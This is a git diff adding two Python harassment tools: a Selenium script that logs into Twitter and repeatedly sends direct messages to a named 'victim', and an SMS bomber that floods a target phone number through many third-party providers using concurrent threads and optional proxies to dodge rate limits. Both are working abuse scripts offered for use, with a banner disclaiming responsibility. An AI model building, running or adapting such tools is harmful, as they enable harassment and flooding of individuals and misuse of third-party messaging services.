diff --git a/Twitter_bomber.py b/Twitter_bomber.py new file mode 100644 index 0000000..29c8457 --- /dev/null +++ b/Twitter_bomber.py @@ -0,0 +1,88 @@ +from selenium import webdriver +import os +from webdriver_manager.chrome import ChromeDriverManager +import argparse +from selenium.webdriver.support.ui import WebDriverWait +from selenium.webdriver.common.by import By +from selenium.webdriver.support import expected_conditions as EC +import time +from selenium.webdriver.chrome.options import Options + + +def banner(): + print(''' + _______ __ __ ____ ____ __ __ ____ + |__ __| \ \ / / | _ \ / __ \ | \/ | | _ \ /\ + | | \ \ /\ / / ___ __ _ _ __ | |_) | | | | | | \ / | | |_) | / \ + | | \ \/ \/ / / __| / _` | | '__| | _ < | | | | | |\/| | | _ < / /\ \ + | | \ /\ / \__ \ | (_| | | | | |_) | | |__| | | | | | | |_) | / ____ \ ☢️ + |_| \/ \/ |___/ \__,_| |_| |____/ \____/ |_| |_| |____/ /_/ \_\ + + By: akshaykalucha3 + Note : I won't be responsible for any damage caused by this script, Use at your own risk + + ''') + +parser = argparse.ArgumentParser(description='Bomb twitter user with spam messages') + +parser.add_argument('--username', type=str, required=True, help="twitter username @\ of user, can be his phone number or email") +parser.add_argument('--password', type=str, required=True, help="twitter password of the user") +args = parser.parse_args() + +chrome_options = webdriver.ChromeOptions() +chrome_options.add_experimental_option("detach", True) +driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options) + + +def bombMsg(n, txt): + for i in range(n): + WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#react-root > div > div > div.css-1dbjc4n.r-18u37iz.r-13qz1uu.r-417010 > main > div > div > div > section:nth-child(2) > div.css-1dbjc4n.r-1pz39u2.r-13awgt0 > div > div > div > div > aside > div.css-1dbjc4n.r-obd0qt.r-18u37iz.r-1uu6nss.r-13qz1uu > div.css-1dbjc4n.r-1kihuf0.r-16y2uox.r-1wbh5a2 > div > div > div > div > div.css-901oao.r-jwli3a.r-6koalj.r-16y2uox.r-1qd0xha.r-a023e6.r-16dba41.r-ad9z0x.r-bcqeeo.r-qvutc0 > div > div > div > div.DraftEditor-editorContainer > div > div > div > div'))).send_keys(txt) + SendBtn = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div/section[2]/div[2]/div/div/div/div/aside/div[2]/div[3]') + SendBtn.click() + print("Bombing Complete !!!") + banner() + + +def attack(): + driver.get('https://twitter.com/login') + userId = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div[1]/form/div/div[1]/label/div/div[2]/div/input') + userId.send_keys(args.username) + userPass = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div[1]/form/div/div[2]/label/div/div[2]/div/input') + userPass.send_keys(args.password) + + loginBtn = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div[1]/form/div/div[3]/div') + loginBtn.click() + driver.minimize_window() + + name = input('Enter the twitter name of victim: ') + if len(name) >= 3: + pass + else: + name = input('Enter the name of victim correctly: ') + + ### GET VICTIM PROFILE PAGE ### + driver.get(f'https://twitter.com/{name}') + time.sleep(1) + driver.maximize_window() + + + ## GET MESSAGE INBOX ### + messageLink = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div/div[1]/div/div[2]/div/div/div[1]/div/div[1]/div/div[2]') + messageLink.click() + driver.minimize_window() + + #### SEND MESSAGE IN VICTIMS INBOX ### + + WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="react-root"]/div/div/div[2]/main/div/div/div/section[2]/div[2]/div/div/div/div/aside/div[2]/div[2]/div/div/div/div/div[1]/div'))).click() + MsgBx = driver.find_element_by_css_selector('#react-root > div > div > div.css-1dbjc4n.r-18u37iz.r-13qz1uu.r-417010 > main > div > div > div > section:nth-child(2) > div.css-1dbjc4n.r-1pz39u2.r-13awgt0 > div > div > div > div > aside > div.css-1dbjc4n.r-obd0qt.r-18u37iz.r-1uu6nss.r-13qz1uu > div.css-1dbjc4n.r-1kihuf0.r-16y2uox.r-1wbh5a2 > div > div > div > div > div.css-901oao.r-jwli3a.r-6koalj.r-16y2uox.r-1qd0xha.r-a023e6.r-16dba41.r-ad9z0x.r-bcqeeo.r-qvutc0 > div > div > div > div.DraftEditor-editorContainer > div > div > div > div') + Ops = int(input("Select what form of messahe you would like to send: \n Enter [1] to send manual message Enter [2] to import a txt file: ")) + if Ops == 1: + Content = input("Enter the message: ") + elif Ops == 2: + fileLoc = input("Enter the file location: ") + instances = int(input("Enter total count: ")) + + bombMsg(instances, Content) + +attack() + diff --git a/test.py b/test.py new file mode 100644 index 0000000..9c485af --- /dev/null +++ b/test.py @@ -0,0 +1,99 @@ + +#!/usr/bin/python3 + +import requests +import argparse +from concurrent.futures import ThreadPoolExecutor +import json +import time +from Provider import Provider + +# args + +parser = argparse.ArgumentParser() +parser.add_argument('target', metavar='TARGET', type=lambda value: (_ for _ in ()).throw(argparse.ArgumentTypeError(f'{value} is an invalid mobile number')) if len(value) != 10 else value, + help='Target mobile number without country code') +parser.add_argument('--sms', '-S', type=int, + help='Number of sms to target (default: 20)', default=20) +parser.add_argument('--country', '-c', type=int, + help='Country code without (+) sign (default: 91)', default=91) +parser.add_argument('--threads', '-T', type=int, + help='Max number of concurrent HTTP(s) requests (default: 20)', default=20) +parser.add_argument('--proxy', '-p', action='store_true', + help='Use proxy for bombing (It is advisable to use this option if you are bombing more than 50 sms)') +parser.add_argument('--verbose', '-v', action='store_true', + help='Verbose') +parser.add_argument('--verify', '-V', action='store_true', + help='To verify all providers are working or not') +args = parser.parse_args() + +# config loading +target = str(args.target) +no_of_threads = args.threads +no_of_sms = args.sms +fails, success = 0, 0 +not args.verbose and not args.verify and print( + f'Target: {target} | Threads: {no_of_threads} | SMS: {no_of_sms}') + +# proxy setup +# https://gimmeproxy.com/api/getProxy?curl=true&protocol=http&supportsHttps=true + + +def get_proxy(): + args.verbose and print('Gethering proxy...') + curl = requests.get( + 'https://gimmeproxy.com/api/getProxy?curl=true&protocol=http&supportsHttps=true').text + if 'limit' in curl: + print('Proxy limitation error. Try without `-p` or `--proxy` argument') + exit() + args.verbose and print(f'Using Proxy: {curl}') + return {"http": curl, "https": curl} + + +proxies = get_proxy() if args.proxy else False +# proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} + +# bomber function + + +def bomber(p): + global fails, success, no_of_sms + if not args.verify and p is None or success > no_of_sms: + return + elif not p.done: + try: + p.start() + if p.status(): + success += 1 + else: + fails += 1 + except: + fails += 1 + args.verbose or args.verify and print( + '{:12}: error'.format(p.config['name'])) + not args.verbose and not args.verify and print( + f'Bombing : {success+fails}/{no_of_sms} | Success: {success} | Failed: {fails}', end='\r') + + +# threadsssss +start = time.time() +if args.verify: + providers = json.load(open('config.json', 'r'))['providers'] + pall = [p for x in providers.values() for p in x] + with ThreadPoolExecutor(max_workers=len(pall)) as executor: + for config in pall: + executor.submit(bomber, Provider(target, proxy=proxies, + verbose=True, cc=str(args.country), config=config)) + print(f'Total {len(pall)} providers available') +else: + with ThreadPoolExecutor(max_workers=no_of_threads) as executor: + for i in range(no_of_sms): + p = Provider(target, proxy=proxies, + verbose=args.verbose, cc=str(args.country)) + executor.submit(bomber, p) +end = time.time() + + +# finalize +print(f'\nSuccess: {success} | Failed: {fails}') +print(f'Took {end-start:.2f}s to complete') \ No newline at end of file